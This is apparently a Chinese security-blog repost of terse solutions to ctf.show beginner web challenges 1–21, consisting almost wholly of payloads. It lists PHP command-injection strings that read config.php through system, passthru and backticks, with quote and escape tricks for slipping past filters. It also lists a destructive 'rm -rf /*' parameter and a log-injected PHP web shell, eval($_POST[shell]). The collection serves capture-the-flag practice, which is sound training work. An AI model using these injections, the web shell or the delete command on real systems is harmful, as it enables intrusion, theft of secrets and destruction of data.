ctf.show萌新计划

admin 2023年1月1日16:33:15安全博客评论2 views489字阅读1分37秒阅读模式

[huayang]

we1-web7大抵差不多构造id=1000

web1

ctf.show萌新计划
?id='1000'
ctf.show萌新计划

[huayang]web2

ctf.show萌新计划
?id=~~1000
ctf.show萌新计划

web3

ctf.show萌新计划
?id=680|960
ctf.show萌新计划

web4

ctf.show萌新计划
?id=682^322
ctf.show萌新计划

web5

ctf.show萌新计划

?id=800^200

ctf.show萌新计划

web6

ctf.show萌新计划
?id=~~1000
ctf.show萌新计划

web7

ctf.show萌新计划
?id=0b1111101000
ctf.show萌新计划

web8

ctf.show萌新计划
?flag=rm -rf /*
ctf.show萌新计划

web9

ctf.show萌新计划
?c=system('nl config.php');
ctf.show萌新计划

web10

ctf.show萌新计划
?c=show_source('config.php');
ctf.show萌新计划

web11

ctf.show萌新计划
?c=echo `nl config.php`;
ctf.show萌新计划

web12

ctf.show萌新计划
?c=echo `nl con''fig?ph''p`;
ctf.show萌新计划

web13

ctf.show萌新计划
?c=passthru('nl conf\ig?p\hp')?>
ctf.show萌新计划

web14

ctf.show萌新计划
?c=echo `nl conf''ig?p''hp`?>
ctf.show萌新计划

web15

ctf.show萌新计划
get:
?c=echo `$_POST[shell]`;
post:
shell=nl config.php
ctf.show萌新计划

web16

ctf.show萌新计划
?c=36d
ctf.show萌新计划

web17-21

ctf.show萌新计划
ctf.show萌新计划

直接日志注入

<?php eval($_POST[shell]);?>
ctf.show萌新计划
ctf.show萌新计划
ctf.show萌新计划

[/huayang]

FROM:浅浅淡淡[hellohy]

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月1日16:33:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ctf.show萌新计划 https://cn-sec.com/archives/1493893.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: